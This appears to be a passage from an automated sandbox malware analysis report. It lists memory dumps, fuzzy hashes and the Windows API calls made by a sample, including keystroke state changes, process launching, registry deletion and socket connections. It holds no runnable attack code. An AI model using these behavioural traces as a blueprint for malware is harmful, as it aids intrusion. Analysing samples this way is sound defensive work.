                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memcmp
                                            • String ID:
                                            • API String ID: 2931989736-0
                                            • Opcode ID: f0e86b0b3f3356c2a2e5533ad1ae1828833daed2b5e71639dafcf1c6cd42ff0d
                                            • Instruction ID: 80e4e91a285adbb82d179fdc5e3f0d5ebd572122f0972a22b9ba54da3f0afa47
                                            • Opcode Fuzzy Hash: f0e86b0b3f3356c2a2e5533ad1ae1828833daed2b5e71639dafcf1c6cd42ff0d
                                            • Instruction Fuzzy Hash: 3D21C575A32206B7D214B9209C86FAB235CAF213D9F244025FD09962C2EB71DE3987B5
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 506504faebe8a6a0b01e9163c2f71b058f00bba8477e1b0258cf744f50e3a795
                                            • Instruction ID: aa869b69f16e1b46d5da20b4793af7f47379ffb095b819026530e0abb0912f58
                                            • Opcode Fuzzy Hash: 506504faebe8a6a0b01e9163c2f71b058f00bba8477e1b0258cf744f50e3a795
                                            • Instruction Fuzzy Hash: 09715B70920119EFCB05DF98CC49ABEBB79FF85314F14C159F915AA251C734AA61CFA0
                                            APIs
                                            • IsWindow.USER32(00BA23F8), ref: 002BB6A5
                                            • IsWindowEnabled.USER32(00BA23F8), ref: 002BB6B1
                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 002BB795
                                            • SendMessageW.USER32(00BA23F8,000000B0,?,?), ref: 002BB7CC
                                            • IsDlgButtonChecked.USER32(?,?), ref: 002BB809
                                            • GetWindowLongW.USER32(00BA23F8,000000EC), ref: 002BB82B
                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002BB843
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                            • String ID:
                                            • API String ID: 4072528602-0
                                            • Opcode ID: ef7a24ae72fe466839c4529e6aaaadafe338345f2f2e05f37fcb517baeb8dc8b
                                            • Instruction ID: 32af022e394751afa4af651aa3db7588b56a5e2c73124fae5ba1b8c5eb9b41cc
                                            • Opcode Fuzzy Hash: ef7a24ae72fe466839c4529e6aaaadafe338345f2f2e05f37fcb517baeb8dc8b
                                            • Instruction Fuzzy Hash: 9B71C435620205AFDB229F65CC98FFABBB9FF49380F140069E95597261CBB1AC60DF50
                                            APIs
                                            • _memset.LIBCMT ref: 002AF75C
                                            • _memset.LIBCMT ref: 002AF825
                                            • ShellExecuteExW.SHELL32(?), ref: 002AF86A
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                              • Part of subcall function 0024FEC6: _wcscpy.LIBCMT ref: 0024FEE9
                                            • GetProcessId.KERNEL32(00000000), ref: 002AF8E1
                                            • CloseHandle.KERNEL32(00000000), ref: 002AF910
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                            • String ID: @
                                            • API String ID: 3522835683-2766056989
                                            • Opcode ID: 9a36ff72004be6807bab06061b984c099f7202922c7f6918ae1085ce6abd5888
                                            • Instruction ID: b0761e6beac829c3c59ad786109e15593bb0959d7e988aee5c5babafd7aaa123
                                            • Opcode Fuzzy Hash: 9a36ff72004be6807bab06061b984c099f7202922c7f6918ae1085ce6abd5888
                                            • Instruction Fuzzy Hash: A561AFB5A10619DFCB14EF94C984AAEBBF4FF49310F148469E846AB351CB34AD60CF90
                                            APIs
                                            • GetParent.USER32(?), ref: 0029149C
                                            • GetKeyboardState.USER32(?), ref: 002914B1
                                            • SetKeyboardState.USER32(?), ref: 00291512
                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00291540
                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0029155F
                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 002915A5
                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002915C8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: 70c328355af031e1079f9bafced739241e786cbd9789e3fcd315cad4a15985d3
                                            • Instruction ID: 082090dc843dd5f9645fc02c42ade9e2ae2cea67620d37e4056b77fb79eaa31c
                                            • Opcode Fuzzy Hash: 70c328355af031e1079f9bafced739241e786cbd9789e3fcd315cad4a15985d3
                                            • Instruction Fuzzy Hash: 5A5103A0A243D73EFF364A368C45BBABEA95B46304F098589E1D5458D2C3D4ECB4D750
                                            APIs
                                            • GetParent.USER32(00000000), ref: 002912B5
                                            • GetKeyboardState.USER32(?), ref: 002912CA
                                            • SetKeyboardState.USER32(?), ref: 0029132B
                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00291357
                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00291374
                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002913B8
                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002913D9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: 455acb373c35d16a4b32856fe7cf064f0af8fc0dbf807ca7b4c6a1bb89e268ca
                                            • Instruction ID: 075944fd94ba9d7861097ef0049f270ff587d5cb75fec390bda3457da121f619
                                            • Opcode Fuzzy Hash: 455acb373c35d16a4b32856fe7cf064f0af8fc0dbf807ca7b4c6a1bb89e268ca
                                            • Instruction Fuzzy Hash: 2351F3A09247D73DFF328B268C45BBABFA95F06300F0885C9E1D8468C2D394ACB4D764
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _wcsncpy$LocalTime
                                            • String ID:
                                            • API String ID: 2945705084-0
                                            • Opcode ID: 0a09367d07739b1494d21bc1017549fa87f2cb2058f67efe4b2fba0784729a42
                                            • Instruction ID: c0cf8627841acdb62b466417a03ab5f4ea15e335c49992c49b60b0d426628edc
                                            • Opcode Fuzzy Hash: 0a09367d07739b1494d21bc1017549fa87f2cb2058f67efe4b2fba0784729a42
                                            • Instruction Fuzzy Hash: 86419366D30528B6DB11FBB488869CFB3AC9F05311F509552FD18E3121E634E768CBAD
                                            APIs
                                              • Part of subcall function 002948AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002938D3,?), ref: 002948C7
                                              • Part of subcall function 002948AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002938D3,?), ref: 002948E0
                                            • lstrcmpiW.KERNEL32(?,?), ref: 002938F3
                                            • _wcscmp.LIBCMT ref: 0029390F
                                            • MoveFileW.KERNEL32(?,?), ref: 00293927
                                            • _wcscat.LIBCMT ref: 0029396F
                                            • SHFileOperationW.SHELL32(?), ref: 002939DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                            • String ID: \*.*
                                            • API String ID: 1377345388-1173974218
                                            • Opcode ID: 6e428cf570d95cb55bf6fa4c9ea9f586cb2ce742e099e501db54ca2a81c8516f
                                            • Instruction ID: 142b5673c348fef3ec27f2ec23a3560a8b824c7637ac1590f787ae5a795292fa
                                            • Opcode Fuzzy Hash: 6e428cf570d95cb55bf6fa4c9ea9f586cb2ce742e099e501db54ca2a81c8516f
                                            • Instruction Fuzzy Hash: FE41B3B241C3859EDB51EF64C845ADFB7E8AF89340F00092EF489C3151EA74D65CCB52
                                            APIs
                                            • _memset.LIBCMT ref: 002B7519
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B75C0
                                            • IsMenu.USER32(?), ref: 002B75D8
                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002B7620
                                            • DrawMenuBar.USER32 ref: 002B7633
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                            • String ID: 0
                                            • API String ID: 3866635326-4108050209
                                            • Opcode ID: b5848947197a6576819dc9dab1907c0518bc62410b805a6a0f3a982bccdfe562
                                            • Instruction ID: 0f8f52ac2a12842b3d0319bb6b5b0382317b168bbd4030b2e218f34e7a30b34d
                                            • Opcode Fuzzy Hash: b5848947197a6576819dc9dab1907c0518bc62410b805a6a0f3a982bccdfe562
                                            • Instruction Fuzzy Hash: E1414A75A14609EFDB20DF58E884EEABBF8FB44390F448129ED2597250D730AD64DFA0
                                            APIs
                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002B125C
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002B1286
                                            • FreeLibrary.KERNEL32(00000000), ref: 002B133D
                                              • Part of subcall function 002B122D: RegCloseKey.ADVAPI32(?), ref: 002B12A3
                                              • Part of subcall function 002B122D: FreeLibrary.KERNEL32(?), ref: 002B12F5
                                              • Part of subcall function 002B122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002B1318
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 002B12E0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                            • String ID:
                                            • API String ID: 395352322-0
                                            • Opcode ID: 5d805a0b13a3bc5c421514d9cd29fbce91549bcd68a9183bb2e6014886453df3
                                            • Instruction ID: b95574dc48cf1d3833ee61a3aedaa6952608f8974ad02e582467503869863174
                                            • Opcode Fuzzy Hash: 5d805a0b13a3bc5c421514d9cd29fbce91549bcd68a9183bb2e6014886453df3
                                            • Instruction Fuzzy Hash: CC316D71910119BFDB149F94EC99AFEB7BCEF08340F4005AAF901E2150EB749FA59AA0
                                            APIs
                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002B655B
                                            • GetWindowLongW.USER32(00BA23F8,000000F0), ref: 002B658E
                                            • GetWindowLongW.USER32(00BA23F8,000000F0), ref: 002B65C3
                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002B65F5
                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002B661F
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 002B6630
                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002B664A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: LongWindow$MessageSend
                                            • String ID:
                                            • API String ID: 2178440468-0
                                            • Opcode ID: 2aee8683171b244f976f369a14bd149300e6964731ce456e84c05e3748cbaed0
                                            • Instruction ID: 718b93ddde62beee2e42b29746d28d01c15e0bf1c5d32c6a97fdc362ba4a9ed4
                                            • Opcode Fuzzy Hash: 2aee8683171b244f976f369a14bd149300e6964731ce456e84c05e3748cbaed0
                                            • Instruction Fuzzy Hash: 74310530614115AFDB308F18EC8DFA537E5FB493A0F580168FA118B2B6CB66AC64DB51
                                            APIs
                                              • Part of subcall function 002A80A0: inet_addr.WS2_32(00000000), ref: 002A80CB
                                            • socket.WS2_32(00000002,00000001,00000006), ref: 002A64D9
                                            • WSAGetLastError.WS2_32(00000000), ref: 002A64E8
                                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 002A6521
                                            • connect.WSOCK32(00000000,?,00000010), ref: 002A652A
                                            • WSAGetLastError.WS2_32 ref: 002A6534
                                            • closesocket.WS2_32(00000000), ref: 002A655D
                                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 002A6576
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                            • String ID:
                                            • API String ID: 910771015-0
                                            • Opcode ID: 6f7b785616cb47d3895625e5fed0b0aa5d715fd76e07058e455deb46a6c0bfb4
                                            • Instruction ID: 2db97235ea81a47e446378f5a91efe4d9bf1edd3d7c4bbc4bc6944e151677f24
                                            • Opcode Fuzzy Hash: 6f7b785616cb47d3895625e5fed0b0aa5d715fd76e07058e455deb46a6c0bfb4
                                            • Instruction Fuzzy Hash: A631E471620218AFDB10AF24DC89BBE7BBDEB46710F044169FD4997290CF70AD54CB61
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0028E0FA
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0028E120
                                            • SysAllocString.OLEAUT32(00000000), ref: 0028E123
                                            • SysAllocString.OLEAUT32 ref: 0028E144
                                            • SysFreeString.OLEAUT32 ref: 0028E14D
                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0028E167
                                            • SysAllocString.OLEAUT32(?), ref: 0028E175
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                            • String ID:
                                            • API String ID: 3761583154-0
                                            • Opcode ID: defbb0b3b70c70bbd65f192349ec4e0d8b6ad4cad7f425403f98671c4aa690b4
                                            • Instruction ID: f7e1796d2d3b959c44f89849b71c44b6090105ce4b7346f72a8d2392754c8158
                                            • Opcode Fuzzy Hash: defbb0b3b70c70bbd65f192349ec4e0d8b6ad4cad7f425403f98671c4aa690b4
                                            • Instruction Fuzzy Hash: 4621B635211109AFDF10AFA8DC8DCAB77FCEB09760B018235FA18CB2A4DA70DC518B64
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • GetWindowLongW.USER32(?,000000F0), ref: 002BB44C
                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002BB471
                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002BB489
                                            • GetSystemMetrics.USER32(00000004), ref: 002BB4B2
                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 002BB4D0
                                            Strings
                                            • 0066894dd2ba6c000000668955d433c0668945d6c745f000000000c745f800000000c745e400000000c745dc000000008d8d38feffff51e881d9ffffb930000000, xrefs: 002BB455, 002BB49D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$Long$MetricsSystem
                                            • String ID: 0066894dd2ba6c000000668955d433c0668945d6c745f000000000c745f800000000c745e400000000c745dc000000008d8d38feffff51e881d9ffffb930000000
                                            • API String ID: 2294984445-2058155810
                                            • Opcode ID: 1638e47db09645b334459d47971c376fd948e33a61cdd5b7c33f642253b43ec9
                                            • Instruction ID: 848935291f3fb830973440e3254e7368104a38ef8509bdf543b3f90a940afa7f
                                            • Opcode Fuzzy Hash: 1638e47db09645b334459d47971c376fd948e33a61cdd5b7c33f642253b43ec9
                                            • Instruction Fuzzy Hash: 84219471920216AFCB219F38DC18BAA37B4FB057A1F104738F966C21E1E7B09820DB50
                                            APIs
